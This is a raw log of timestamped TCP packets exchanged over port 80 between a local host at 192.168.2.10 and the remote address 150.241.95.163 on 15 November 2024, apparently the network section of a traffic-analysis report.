Nov 15, 2024 10:28:59.953460932 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.954615116 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.954668045 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.954679966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.954682112 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.954758883 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.958875895 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.958888054 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.958899021 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.958946943 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.958952904 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.958960056 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959026098 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.959335089 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959393024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959410906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959423065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959434032 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959458113 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.959458113 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.959486961 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.959510088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959549904 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959561110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.959923983 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.963932991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.963946104 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.963952065 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.963964939 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.963975906 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.964031935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.964082003 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.970174074 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.970221996 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.970233917 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.970278025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.970277071 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.970290899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.970371008 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.985037088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985058069 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985066891 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985074043 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985140085 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985148907 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.985151052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985163927 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.985217094 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.985243082 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.994782925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994796038 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994801998 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994833946 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994846106 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994857073 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994963884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994976044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.994982004 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.994982004 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.994988918 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995002031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995038986 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.995038986 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.995270967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995280981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995290995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995330095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995341063 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995342016 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.995373011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995384932 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995413065 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.995413065 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.995738029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995749950 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995762110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.995796919 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.996654034 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.997437000 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.997467041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.997477055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.997503042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.997543097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.997543097 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:28:59.997545004 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.997556925 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:28:59.997669935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.003029108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.003087044 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.003098011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.003139973 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.004741907 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004760981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004805088 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004810095 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.004816055 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004837990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004847050 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.004873991 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004893064 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.004956961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.004967928 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.005007982 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.013752937 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.013766050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.013772011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.013782978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.013793945 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.013806105 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.013923883 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.013923883 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.014363050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014568090 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014581919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014594078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014605999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014616966 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014627934 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014638901 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014648914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014652014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.014652014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.014659882 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.014739990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.021507978 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.021569967 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.021584988 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.021759987 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.022125006 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.022135973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.022207975 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.025259018 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.025276899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.025701046 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.040501118 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040519953 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040530920 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040601015 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040611029 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040616035 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.040623903 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040671110 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.040766954 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.040771961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040781975 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040836096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040899992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040952921 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.040952921 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.040960073 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040980101 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.040992022 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041054010 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041161060 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041172981 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041186094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041208982 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041235924 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041321993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041366100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041383028 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041429043 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041434050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041446924 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041476011 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041760921 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041779041 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041791916 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041802883 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041815042 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.041822910 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041868925 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.041868925 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.042125940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042138100 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042149067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042190075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.042279005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042290926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042300940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042359114 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.042359114 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.042403936 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042416096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042622089 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.042660952 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042673111 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042682886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.042732000 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.043793917 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.043812990 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.043822050 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.043874979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.043874979 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.048866987 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.048877954 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.048949957 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.048981905 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.048991919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.049014091 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.049031019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.049042940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.049055099 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.049073935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.049073935 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.049091101 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.050069094 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050115108 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050124884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050164938 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.050185919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050198078 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050209999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050256014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.050256014 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.050338984 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050379992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050391912 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.050436974 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.052639961 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.052659035 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.052668095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.052721977 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.052822113 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.054992914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055049896 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055063963 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055075884 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055114985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.055114985 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.055144072 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055155993 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055167913 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055305958 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055322886 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055332899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055453062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055449009 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.055449009 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.055449009 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.055468082 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055478096 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.055517912 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.059757948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.059803009 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.059813023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.059885025 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.061909914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.061963081 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.061973095 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.061984062 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.061994076 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062056065 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.062057018 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.062098026 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062108994 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062118053 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062128067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062169075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.062169075 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.062285900 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062295914 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.062356949 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.064701080 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.064769983 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.064779997 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.064848900 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.064848900 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.067389011 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.067430019 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.067486048 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.067610025 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.067625046 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.067728996 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.070312977 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.070324898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.070334911 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.070369959 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.071460962 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.071506023 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.071516037 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.071527004 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.071569920 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.075864077 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.075879097 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.075890064 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.075901985 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.075973034 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.075979948 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.075992107 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076045990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.076045990 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.076258898 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076272964 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076292992 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076303005 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076309919 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076327085 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.076368093 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.076406002 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076419115 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076428890 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.076473951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.076473951 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.080051899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.080064058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.080075979 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.080152035 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.080643892 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.080657959 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.080668926 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.080729008 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.080729008 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.087126017 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.087172031 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.087182999 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.087198973 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.087209940 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.087238073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.087238073 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.102072001 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102086067 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102102995 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102135897 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102148056 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102164030 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102174044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.102174044 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.102195024 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102207899 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102220058 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.102252960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.102252960 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.102319002 CET	49762	80	192.168.2.10	150.241.95.163
Nov 15, 2024 10:29:00.111879110 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.111906052 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.111933947 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.111952066 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.111983061 CET	80	49762	150.241.95.163	192.168.2.10
Nov 15, 2024 10:29:00.111982107 CET	49762	80	192.168.2.10	150.241.95.163
